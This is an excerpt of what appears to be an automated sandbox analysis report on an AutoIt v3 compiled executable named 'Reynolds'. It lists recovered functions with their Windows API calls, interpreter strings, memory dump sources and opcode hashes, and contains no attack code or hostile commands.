                                                                                                      • wprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7AA167D43
                                                                                                      • MessageBoxW.USER32(?,?,?,?,?,?,?,?,00000000,?,?,?,?,00007FF7AA0F475D,?,00007FF7AA0F3C00), ref: 00007FF7AA167DD7
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HandleLoadMessageModuleStringwprintf
                                                                                                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                      • API String ID: 4007322891-4153970271
                                                                                                      • Opcode ID: afe30fabcc8c2b5dfb3624d463207571e08e071ef3068ceab152869195660280
                                                                                                      • Instruction ID: 0960f997be4a07f37090bbf8114ce453a8d347b80764567a37dc6089d83f26db
                                                                                                      • Opcode Fuzzy Hash: afe30fabcc8c2b5dfb3624d463207571e08e071ef3068ceab152869195660280
                                                                                                      • Instruction Fuzzy Hash: AA318C72A19A83E1EB11EB14F4805AEA361FB84B84FC24076EA4D476A9DF3CD51BC750
                                                                                                      Function 00007FF7AA0F3EF8 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 57windowregistryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                      • String ID: AutoIt v3 GUI$TaskbarCreated
                                                                                                      • API String ID: 2914291525-2659433951
                                                                                                      • Opcode ID: 97a1d40f626d07f8b6b8daa48bc59cc996610198c86794b7ab60cb7639f08fb7
                                                                                                      • Instruction ID: 92b075257d9c98ac7cd309ee392b289e590aee270d569b93c777132529219437
                                                                                                      • Opcode Fuzzy Hash: 97a1d40f626d07f8b6b8daa48bc59cc996610198c86794b7ab60cb7639f08fb7
                                                                                                      • Instruction Fuzzy Hash: B0315572A09B41EAF751AF60F8443A8B7B4FB58358F950178CA9D03B64CF7C915ACB60
                                                                                                      Function 00007FF7AA1A14FC Relevance: 15.2, APIs: 10, Instructions: 209windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 00007FF7AA0F2794: GetWindowLongPtrW.USER32(?,?,00000000,00007FF7AA13A57D), ref: 00007FF7AA0F27B1
                                                                                                      • PostMessageW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AA1A156E
                                                                                                      • GetFocus.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AA1A157F
                                                                                                      • GetDlgCtrlID.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AA1A158C
                                                                                                      • GetMenuItemInfoW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AA1A16C3
                                                                                                      • GetMenuItemCount.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AA1A16E1
                                                                                                      • GetMenuItemID.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AA1A16F6
                                                                                                      • GetMenuItemInfoW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AA1A1731
                                                                                                      • GetMenuItemInfoW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AA1A177C
                                                                                                      • CheckMenuRadioItem.USER32 ref: 00007FF7AA1A17B3
                                                                                                        • Part of subcall function 00007FF7AA1A02A8: IsWindow.USER32(?,?,?,?,?,?,?,?,?,00007FF7AA13A2D7), ref: 00007FF7AA1A036D
                                                                                                        • Part of subcall function 00007FF7AA1A02A8: IsWindowEnabled.USER32(?,?,?,?,?,?,?,?,?,00007FF7AA13A2D7), ref: 00007FF7AA1A037A
                                                                                                      • DefDlgProcW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AA1A17EA
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ItemMenu$InfoWindow$CheckCountCtrlEnabledFocusLongMessagePostProcRadio
                                                                                                      • String ID:
                                                                                                      • API String ID: 2672075419-0
                                                                                                      • Opcode ID: 5de48b37807cf5e9572c5b55aff88bc579260c59b463e26447def2c6e42a81eb
                                                                                                      • Instruction ID: b8943958ff014f0ac220fada5ffc17215da0de607eb18e9a2c84e820974be337
                                                                                                      • Opcode Fuzzy Hash: 5de48b37807cf5e9572c5b55aff88bc579260c59b463e26447def2c6e42a81eb
                                                                                                      • Instruction Fuzzy Hash: 50919176B0A612EAF752EF61E4402BDA3B1BB44B98F960075DE4D437A5CE38E447C720
                                                                                                      Function 00007FF7AA0F9924 Relevance: 14.4, APIs: 2, Strings: 6, Instructions: 435COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 00007FF7AA0F780C: CreateFileW.KERNEL32 ref: 00007FF7AA0F7876
                                                                                                        • Part of subcall function 00007FF7AA1141D0: GetCurrentDirectoryW.KERNEL32(?,00007FF7AA0F99C7), ref: 00007FF7AA1141EC
                                                                                                        • Part of subcall function 00007FF7AA0F5A50: GetFullPathNameW.KERNEL32(?,00007FF7AA0F5A3D,?,00007FF7AA0F4C50,?,?,?,00007FF7AA0F109E), ref: 00007FF7AA0F5A7B
                                                                                                      • SetCurrentDirectoryW.KERNEL32 ref: 00007FF7AA0F9A60
                                                                                                      • SetCurrentDirectoryW.KERNEL32 ref: 00007FF7AA0F9BA0
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentDirectory$CreateFileFullNamePathwcscpy
                                                                                                      • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                                      • API String ID: 2207129308-3738523708
                                                                                                      • Opcode ID: da8776b3935f108f372e0f447b79be8c4908acda2ed79a75d128fc386c9bb0f4
                                                                                                      • Instruction ID: 5acc204b8cd7b9b270c5f31e64bfc7cbbeab8bcbce124797c5eb8ad3831a928c
                                                                                                      • Opcode Fuzzy Hash: da8776b3935f108f372e0f447b79be8c4908acda2ed79a75d128fc386c9bb0f4
                                                                                                      • Instruction Fuzzy Hash: 54127F22A1A643D5FB51EF21E4801BEA770FB84794FC20572EA4E536A9EF3CD546C720
                                                                                                      Function 00007FF7AA0F8248 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 289comCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DestroySendStringUninitializeUnregisterWindow
                                                                                                      • String ID: close all
                                                                                                      • API String ID: 1992507300-3243417748
                                                                                                      • Opcode ID: 5baaea7a998fb5a64be74ad77031d7567826fe4b93f306c701784b71cba838e4
                                                                                                      • Instruction ID: 5089ad468d59ae5e17c169056bdddf59b31e8122025c271dce4098cd962af4d9
                                                                                                      • Opcode Fuzzy Hash: 5baaea7a998fb5a64be74ad77031d7567826fe4b93f306c701784b71cba838e4
                                                                                                      • Instruction Fuzzy Hash: F2D12426B0B903D1FE99EF16D5902BEA360AF44B44F9540B5DB0E672A1DF38D8778720
                                                                                                      Function 00007FF7AA187FD8 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 231COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$_NewEnum$get__NewEnum
                                                                                                      • API String ID: 0-1765764032
                                                                                                      • Opcode ID: 7e2a3d229f0fbfbb0bb3e4ac55cef0babde8bd6d800c2740a403695577890c75
                                                                                                      • Instruction ID: 9c23c36d8f62b7c09cadf806c003a645dd04a2b65b4bfe416c9ca2effca76e4c
                                                                                                      • Opcode Fuzzy Hash: 7e2a3d229f0fbfbb0bb3e4ac55cef0babde8bd6d800c2740a403695577890c75
                                                                                                      • Instruction Fuzzy Hash: B5A19A36A09B41E6FB22AF61E4402BDA7B5FB98B98F860176CA4D03764CF3CD446C751
                                                                                                      Function 00007FF7AA19ABC4 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 139windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$Window$CreateObjectStockwcscat
                                                                                                      • String ID: -----$SysListView32
                                                                                                      • API String ID: 2361508679-3975388722
                                                                                                      • Opcode ID: ea816c629daf7890c5ddb102d8fb278a57c9d15cc399289f831795b74fbae7da
                                                                                                      • Instruction ID: 86566effe9ade56d9629abc7e8cc86325a7cd6a9dc89d55f139980ea0a4f1a0a
                                                                                                      • Opcode Fuzzy Hash: ea816c629daf7890c5ddb102d8fb278a57c9d15cc399289f831795b74fbae7da
                                                                                                      • Instruction Fuzzy Hash: 3351BF32A05791EAE721DF24E8446E9B3B1FB48788F81017AEE4C47B65DF38D556CB40
                                                                                                      Function 00007FF7AA0F3CEC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 60windowregistryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetSysColorBrush.USER32(?,?,?,?,?,?,?,?,?,00007FF7AA0F3C7D,?,?,?,?,?,00007FF7AA0F2BC1), ref: 00007FF7AA0F3D06
                                                                                                      • LoadCursorW.USER32(?,?,?,?,?,?,?,?,?,00007FF7AA0F3C7D,?,?,?,?,?,00007FF7AA0F2BC1), ref: 00007FF7AA0F3D16
                                                                                                      • LoadIconW.USER32(?,?,?,?,?,?,?,?,?,00007FF7AA0F3C7D,?,?,?,?,?,00007FF7AA0F2BC1), ref: 00007FF7AA0F3D2B
                                                                                                      • LoadIconW.USER32(?,?,?,?,?,?,?,?,?,00007FF7AA0F3C7D,?,?,?,?,?,00007FF7AA0F2BC1), ref: 00007FF7AA0F3D44
                                                                                                      • LoadIconW.USER32(?,?,?,?,?,?,?,?,?,00007FF7AA0F3C7D,?,?,?,?,?,00007FF7AA0F2BC1), ref: 00007FF7AA0F3D5D
                                                                                                      • LoadImageW.USER32 ref: 00007FF7AA0F3D89
                                                                                                      • RegisterClassExW.USER32 ref: 00007FF7AA0F3DED
                                                                                                        • Part of subcall function 00007FF7AA0F3EF8: GetSysColorBrush.USER32 ref: 00007FF7AA0F3F4D
                                                                                                        • Part of subcall function 00007FF7AA0F3EF8: RegisterClassExW.USER32 ref: 00007FF7AA0F3F7E
                                                                                                        • Part of subcall function 00007FF7AA0F3EF8: RegisterWindowMessageW.USER32 ref: 00007FF7AA0F3F92
                                                                                                        • Part of subcall function 00007FF7AA0F3EF8: InitCommonControlsEx.COMCTL32 ref: 00007FF7AA0F3FB0
                                                                                                        • Part of subcall function 00007FF7AA0F3EF8: ImageList_Create.COMCTL32 ref: 00007FF7AA0F3FCB
                                                                                                        • Part of subcall function 00007FF7AA0F3EF8: LoadIconW.USER32 ref: 00007FF7AA0F3FE4
                                                                                                        • Part of subcall function 00007FF7AA0F3EF8: ImageList_ReplaceIcon.COMCTL32 ref: 00007FF7AA0F3FF7
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                      • String ID: AutoIt v3
                                                                                                      • API String ID: 423443420-1704141276
                                                                                                      • Opcode ID: 5d34682438d4925233b099617d424a34890b62ea6906e6c19d5122f867670d4b
                                                                                                      • Instruction ID: 7d4661b7713f2d52d4e7a5b9c40aa4504fb07a1ad95a53b139d14f1e4f4e761a
                                                                                                      • Opcode Fuzzy Hash: 5d34682438d4925233b099617d424a34890b62ea6906e6c19d5122f867670d4b
                                                                                                      • Instruction Fuzzy Hash: AC313836A0AB42EAF752EB90F844379B3B4BB94758F850179C94D13B28DF7C9156C720
                                                                                                      Function 00007FF7AA1371D8 Relevance: 13.8, APIs: 9, Instructions: 272fileCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                      • String ID:
                                                                                                      • API String ID: 1617910340-0
                                                                                                      • Opcode ID: e698672ba2fde47866938956bdd2d104ce607d52ab9d410fe63d21d4b336d6a1
                                                                                                      • Instruction ID: adca016fced46782754e4da8c652307dfe6f560c9f241626615a40c26ab45bcc
                                                                                                      • Opcode Fuzzy Hash: e698672ba2fde47866938956bdd2d104ce607d52ab9d410fe63d21d4b336d6a1
                                                                                                      • Instruction Fuzzy Hash: ABC1CF32B1AA41DAFB55DF64E4803AC77B1A7497A8F424275DE2E5B7A4CF38D016C320
                                                                                                      Function 00007FF7AA19CB9C Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                                      • String ID:
                                                                                                      • API String ID: 3210457359-0
                                                                                                      • Opcode ID: 13f1134b8e25db497226d3983802e6b8d12e784a5e0e0389ad28e06e0f0fc450
                                                                                                      • Instruction ID: 1d06f122d975a7c284f3c1b2e13220d5f440621b00d693d77e18a34cde1ac0f9
                                                                                                      • Opcode Fuzzy Hash: 13f1134b8e25db497226d3983802e6b8d12e784a5e0e0389ad28e06e0f0fc450
                                                                                                      • Instruction Fuzzy Hash: 70618631A0A543EAF766BA25E440BB9EB62BF40B94F928075E94D026F5CE3CE443D750
                                                                                                      Function 00007FF7AA1A12A4 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 142windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageReleaseScreenSendText
                                                                                                      • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                      • API String ID: 3721556410-2107944366
                                                                                                      • Opcode ID: d033586eeb8420df0584d02cad3e0ad78160aa9a1a2060901ffcbfff1dfca609
                                                                                                      • Instruction ID: 606b81365e73b6c3337c5cb00be0093833b198344c0c6a984037db15c8f5773b
                                                                                                      • Opcode Fuzzy Hash: d033586eeb8420df0584d02cad3e0ad78160aa9a1a2060901ffcbfff1dfca609
                                                                                                      • Instruction Fuzzy Hash: 6061AB72A1AA52E6FB11EF61E8805ADB770FB44B98F820176E90D13AB5DF38D446C350
                                                                                                      Function 000002453CA28930 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 142COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2312180188.000002453CA20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002453CA20000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_2453ca20000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: fputwcfwprintf
                                                                                                      • String ID: %*.*s$%-*.*s$%.*s
                                                                                                      • API String ID: 3232229890-4054516066
                                                                                                      • Opcode ID: 091f6d06562d500ade4900664ac70f4b207829fc3b6deb1cd0af7661ad57b24c
                                                                                                      • Instruction ID: 662f305576073c1f2336a2f32136ca90500da4838ef4b6843b47684f050ca13d
                                                                                                      • Opcode Fuzzy Hash: 091f6d06562d500ade4900664ac70f4b207829fc3b6deb1cd0af7661ad57b24c
                                                                                                      • Instruction Fuzzy Hash: C4519773600F358BE73A8F5AE05872A7BA1E744790F118159EBDB87AD2DB39D4C19B00
                                                                                                      Function 00007FF7AA16A6DC Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 135windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                      • String ID: 2$P
                                                                                                      • API String ID: 93392585-1110268094
                                                                                                      • Opcode ID: c4d75c7bed3dc32d74565b12e7beeeeebc4fd81d0a729176aca41e8b187ce2d2
                                                                                                      • Instruction ID: c83fa5676241f87b6bac18754a46ac420b04ad8573c68ff4322c1fd3638667e9
                                                                                                      • Opcode Fuzzy Hash: c4d75c7bed3dc32d74565b12e7beeeeebc4fd81d0a729176aca41e8b187ce2d2
                                                                                                      • Instruction Fuzzy Hash: 03514532E0A752E9F726AF21E4402BCB7B9AB00759F594075CA5E936A5CF38E443D321
                                                                                                      Function 000002453CA21BA0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 106memoryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
